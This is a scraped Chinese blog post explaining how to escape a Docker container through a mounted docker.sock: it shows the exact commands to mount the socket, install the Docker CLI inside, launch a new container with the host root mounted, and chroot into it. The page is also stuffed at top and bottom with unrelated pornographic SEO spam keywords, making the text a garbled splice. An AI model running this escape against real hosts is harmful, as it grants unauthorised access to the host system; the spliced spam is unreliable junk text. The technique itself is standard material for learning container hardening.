<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      容器逃逸 --with docker.sock

      容器逃逸 --with docker.sock

      本人對于容器逃逸的基本理解就是用戶從容器中逃出去到宿主機里去了。

      本文意在記錄一個使用 docker.sock 來進行容器逃逸的方法。

      首先隨便來個鏡像,這里選用 ubuntu:20.04

      docker pull ubuntu:20.04
      docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock -d ubuntu:20.04
      

      可以看到這里掛載了 docker.sock 到容器內。

      進入容器并下載 docker-ce-cli

      apt update
      apt-get install     ca-certificates     curl     gnupg     lsb-release
      
      mkdir -p /etc/apt/keyrings
      curl -fsSL https://download.docker.com/linux/ubuntu/gpg | gpg --dearmor -o /etc/apt/keyrings/docker.gpg
      
      echo \
        "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu \
        $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
      
      apt-get update
      apt-get install docker-ce-cli
      

      然后運行一個新的容器:

      docker run -it -v /:/host ubuntu:20.04 bash
      

      可以看到這里把根目錄掛載到了新的容器內,要注意這個根目錄可不是當前容器的根目錄,而是當前容器的宿主機的根目錄,在新的容器內,我們執行

      chroot /host
      

      這樣就可以在新的容器內直接訪問宿主機的文件系統了,實現了逃逸。

      posted @ 2022-12-16 14:39  xDaniel  閱讀(325)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 蜜桃网址| 制服丝袜国产精品| 中文字幕va一区二区三区| 女同性恋一区二区三区视频| 久久国产成人高清精品亚洲| 丁香花在线影院观看在线播放| 日本国产精品第一页久久| 日韩精品区一区二区三vr| 国产成人免费ā片在线观看| 日本亚洲欧洲免费无线码| 国产一区二区黄色在线观看| 色伊人久久综合中文字幕| 狠狠色狠狠色综合日日不卡| 亚洲欧美国产精品久久久久久久| 亚洲一区二区中文字幕| 亚洲精品一区二区三区中文字幕 | 蜜桃一区二区三区免费看| 亚洲中文字幕日产无码成人片| 最新亚洲春色av无码专区| 亚洲性一交一乱一伦视频| 国产成人综合色就色综合| 国产精品一码二码三码| 狠狠色婷婷久久综合频道日韩| 国产精品久久欧美久久一区| 久青草精品视频在线观看| 福利一区二区在线播放| 亚洲国产精品综合久久网各| 公与淑婷厨房猛烈进出视频免费 | 国产欧美在线手机视频| 亚洲精品麻豆一二三区| 穆棱市| 亚洲精品一区久久久久一品av | 成在线人永久免费视频播放 | 91密桃精品国产91久久| 国产一区二区三区精品综合| 亚洲区欧美区综合区自拍区| 亚洲一区二区约美女探花| 婷婷六月天在线| 亚洲一级片一区二区三区| 草裙社区精品视频播放| 欧美丰满熟妇vaideos|